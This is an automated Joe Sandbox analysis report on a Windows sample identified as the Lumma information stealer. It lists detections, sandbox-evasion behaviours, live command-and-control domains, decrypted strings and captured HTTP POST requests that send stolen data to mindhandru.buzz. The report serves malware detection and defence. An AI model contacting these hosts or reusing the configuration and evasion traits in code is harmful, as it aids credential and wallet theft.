Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zi042476Iv.exe

Overview

General Information

Sample name:zi042476Iv.exe
renamed because original name is a hash value
Original sample name:e5c73b43bd01bb3580af440576a00ad3.exe
Analysis ID:1581216
MD5:e5c73b43bd01bb3580af440576a00ad3
SHA1:e77f4d19f5b74853fddf4e03f8e73d04a67eeef6
SHA256:73530f53798c09139cbc44033cc2259de175bbc508819527137da458d0d4dd73
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • zi042476Iv.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\zi042476Iv.exe" MD5: E5C73B43BD01BB3580AF440576A00AD3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "mindhandru.buzz", "inherineau.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: zi042476Iv.exe PID: 6492JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: zi042476Iv.exe PID: 6492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: zi042476Iv.exe PID: 6492JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:41:49.256104+010020283713Unknown Traffic192.168.2.949712172.67.165.185443TCP
                2024-12-27T08:41:51.309576+010020283713Unknown Traffic192.168.2.949718172.67.165.185443TCP
                2024-12-27T08:41:53.794022+010020283713Unknown Traffic192.168.2.949724172.67.165.185443TCP
                2024-12-27T08:41:56.056067+010020283713Unknown Traffic192.168.2.949730172.67.165.185443TCP
                2024-12-27T08:42:05.806654+010020283713Unknown Traffic192.168.2.949752172.67.165.185443TCP
                2024-12-27T08:42:08.405022+010020283713Unknown Traffic192.168.2.949758172.67.165.185443TCP
                2024-12-27T08:42:11.074170+010020283713Unknown Traffic192.168.2.949763104.21.11.101443TCP
                2024-12-27T08:42:15.831457+010020283713Unknown Traffic192.168.2.949776104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:41:49.994221+010020546531A Network Trojan was detected192.168.2.949712172.67.165.185443TCP
                2024-12-27T08:41:52.092267+010020546531A Network Trojan was detected192.168.2.949718172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:41:49.994221+010020498361A Network Trojan was detected192.168.2.949712172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:41:52.092267+010020498121A Network Trojan was detected192.168.2.949718172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:42:09.163141+010020480941Malware Command and Control Activity Detected192.168.2.949758172.67.165.185443TCP
                2024-12-27T08:42:11.079369+010020480941Malware Command and Control Activity Detected192.168.2.949763104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:42:11.079369+010028438641A Network Trojan was detected192.168.2.949763104.21.11.101443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: zi042476Iv.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz/1Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/lfAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apipAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apizZAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/OAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/KAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apixAvira URL Cloud: Label: malware
                Found malware configuration
                Source: zi042476Iv.exe.6492.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "mindhandru.buzz", "inherineau.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}
                Multi AV Scanner detection for submitted file
                Source: zi042476Iv.exeVirustotal: Detection: 52%Perma Link
                Source: zi042476Iv.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: zi042476Iv.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: zi042476Iv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49763 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49718 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49718 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49758 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49763 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49763 -> 104.21.11.101:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49724 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49758 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49718 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49730 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49763 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49752 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3RZK0SB31R8T983C3ZHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12857Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QDB45LVK03BQPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15039Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8IC5CEH6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20525Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X5992ZCBKQN2HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q9LXEUVN8EZW59MCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584458Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.000000000133D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000134A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microP
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: zi042476Iv.exe, 00000000.00000002.1619925358.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/1
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/K
                Source: zi042476Iv.exe, 00000000.00000003.1527140960.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526983311.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/O
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551405833.0000000005CCC000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000135D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1530254887.000000000135A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apip
                Source: zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apix
                Source: zi042476Iv.exe, 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apizZ
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
                Source: zi042476Iv.exe, 00000000.00000003.1550520984.0000000005CC4000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550598616.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/lf
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
